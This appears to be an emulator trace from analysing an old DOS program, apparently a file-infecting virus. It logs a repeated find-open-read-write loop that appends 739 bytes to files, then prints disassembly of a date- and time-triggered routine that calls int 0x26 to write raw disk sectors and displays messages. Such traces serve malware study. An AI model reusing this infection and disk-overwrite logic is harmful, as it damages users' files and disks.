2018-12-25T11:44:30.618196347Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:44:30.726148512Z 66 PC: 141f6 | Move file pointer
2018-12-25T11:44:30.732784328Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:30.740376702Z 62 PC: 14190 | Close file
2018-12-25T11:44:30.74957559Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.753857039Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.76114407Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.768232431Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.771098669Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.774527057Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.783771287Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.786379629Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.795547932Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.804653759Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.808914384Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.817475211Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.824793888Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.827000063Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.830962884Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.840167834Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.842173867Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.849931861Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.859833281Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.863113971Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.871298401Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.878597705Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.880388833Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.884661846Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.893758706Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.895524296Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.903958866Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.913079485Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.916035367Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.926240054Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.935295271Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.936856604Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.94000758Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.949358631Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.950830486Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.958119589Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.970957756Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.973668631Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.980482628Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.988824997Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.992087716Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.995460606Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:31.006337568Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:31.007915329Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:31.016947898Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:31.02707995Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:31.03159488Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:31.039262143Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:31.047160697Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:31.049586126Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:31.052522456Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:31.062046935Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:31.064741381Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:31.072131275Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:31.08129948Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:31.084985114Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:31.092932334Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:31.095993376Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:31.098814836Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:31.102131608Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T11:44:31.10494908Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T11:44:31.108602015Z 44 PC: 14283 | Get time 0x14283: inc dh
0x14285: cmp dh, byte ptr [0x319]
0x14289: jl 0x14291
0x1428b: sub dh, byte ptr [0x319]
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
0x14295: cwde
0x14296: shl ax, 1
0x14298: add bx, ax
0x1429a: mov si, word ptr [bx]
0x1429c: mov ch, byte ptr [si - 1]
0x1429f: mov dx, si
0x142a1: mov ah, 9
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20
0x142ac: cmp ch, 1
0x142af: jne 0x142b2